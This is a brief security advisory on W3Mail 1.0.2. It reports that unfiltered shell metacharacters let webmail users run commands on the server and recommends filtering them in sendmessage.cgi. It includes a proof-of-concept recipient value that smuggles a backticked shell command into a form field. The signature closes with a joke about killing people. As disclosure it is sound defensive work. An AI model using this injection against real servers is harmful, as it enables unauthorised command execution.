Name: W3Mail 1.0.2 Personal and Commercial Version
Author: Spencer Miles
Problem: Script doesnt check for special metacharacters like
&;`'\"|*?~<>^()[]{}$\n\r. Any webmail user can execute *nix
commands on webserver.
Exploit:
On any field at "Compose Message", put something like:
(Recipient example)
foo@bar.com"; `/bin/touch /tmp/foobar`; $foo = "bar
Fix:
Filter this metacharacters on sendmessage.cgi and others..
[]s
--corb
--
Lord, grant me the serenity to accept the things I cannot
change, the courage to change the things I can, and the
wisdom to hide the bodies of the people I had to kill because
they pissed me off.
